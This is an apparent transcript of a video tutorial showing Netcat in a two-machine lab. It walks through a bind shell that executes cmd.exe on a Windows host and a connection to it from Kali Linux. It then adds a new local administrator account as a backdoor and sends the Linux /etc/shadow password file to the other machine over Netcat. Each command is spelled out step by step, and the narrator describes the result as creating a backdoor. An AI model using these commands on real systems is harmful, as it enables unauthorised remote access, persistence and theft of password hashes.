Hello everyone. In this video I'm going to talk about a very special utility. It's a network utility known as Netcat. This utility is very small in size. It's available both in Windows 32 and 64 architectures, and also by default most of the Linux flavors this utility is available as a preloaded tool. So this tool can be used to multiple purposes, and in size it's somewhere around 60 KB or so. It's a really small tool, but it can do a lot. So when it comes to accessing or remote access is one of the things that Netcat can do. I'm going to demonstrate today how to create a session using Netcat from Windows machine to a Linux machine, and then what we can do once you get the session. I will take you through the step-by-step process, how to configure Netcat, and then how to connect from Linux machine to Windows machine, and what are the things that we can do when you get the control, and then how to maintain it, and what are the additional stuff that we can do with Netcat. Let's begin. Alright, so this is my Windows machine. Let's see what is the IP first by just typing ipconfig. Right, so my IP is 192.168.1.11 here. So host name is this one you would see here now. So I have 192.168.1.11. So I have downloaded Netcat to this machine, and let's try to run it. So if you go into dir, you would find netcat.exe here somewhere around 60 KB. It's really small in size. Let me clear this window first, and then I'm going to write netcat. Then I'm going to say a listener. I'm going to open up listener by providing minus or hyphen capital L, and then I'm going to say with P a port. I'm going to define a port called 12345. That's up to you. You can configure any port you want, and then I'm going to say if connected, execute cmd.exe. That's what I do. Again, my command I have given in the description. So netcat hyphen space hyphen L, capital L, to create a listener, and then space hyphen P to create or specify a port, and I specify 12345, and space hyphen E to execute this command called cmd. So let's go to my Linux machine now. So this is my Linux machine, and there you would see if I type nc, it's there, right? So it's there. Now I'm gonna say netcat, and then I'm going to specify the IP address 192.168.1.11 in this case, and then I'm going to say 12345, which is my port. So here we are. Now you would see in a Linux machine, now I am seeing a Windows interface, which means I have connected or created a connection from Linux machine to Windows machine. Now I can do pretty much anything I want to. Before that, I would like to show you the version there. If I go in there, host name is Kali here, and then if I type this one, you would see host name is this, which is my Windows machine. Now what else I can do? Once you connect it, you can do a lot, right? So let's say, so what I'm going to do is net user, then I'm going to say add, then I'm going to create a user. Let's say demo nc test, and then I'm going to specify a password. Let's say 1234556. Now you would see I have created a user. Let's type net user command, and then you would see the user that I've created now, demo nc test. Now user is created. Now what else I can do? I can add this user as an administrator. Let's see how I can do that. Local groups, add administrators, and then my username is demo nc test. Type it there. Let's type again. Net local group add administrators. My username is demo nc test. So I created a user and added user as an administrator. Let's go and have a look there. So if I go into my Windows machine, and if I go into my computer management, so this is my computer management. If you go into users, you would see this is the user that I've created, demo nc test. And if you go into groups, administrators, now you would see my demo nc test is added. So that's what you can do using nc. I'll show you one more cool thing. Now let's see what else we can do. Now what I'm going to do is I'm going to receive file from Linux machine to my Windows machine. And especially in Linux machines, we store passwords in etc password file or etc shadow file. So we're going to send etc shadow file to Windows. Let's see how we can do. So I'm going to do nc l and p1234. The port I'm going to specify. I'm going to receive this file to test nc.txt. That's what I'm going to do. Again, netcat -l to create a listener using port 1234, and then I'm going to create a text file. So I enter this. Then let's go to my Linux box, and then I'm going to say nc, and then I'm going to specify timeout w3, and then I'm going to say 192.168.1.11 and port is 1234. I'm going to send etc shadow. Now I'm sending this file to my Windows. Let's go and have a look at my Windows. There I should be receiving this by now. Let's do notepad test txt, sorry, test nc.txt. If I open up, here we are. So we have all the password in my Linux machine transferred to the Windows. Same thing we can do from Windows to Linux and Linux to Windows. In this video, I showed and I demonstrated you how to create a backdoor from in Windows and connect to this backdoor using Linux, and also how to transfer file from Linux to Windows using Netcat. Netcat is a tool that we're going to download from the internet. Really small and tiny tool, but it can do a lot. And I hope it's informative and you understood the concept. And thanks for viewing, and see you with next video.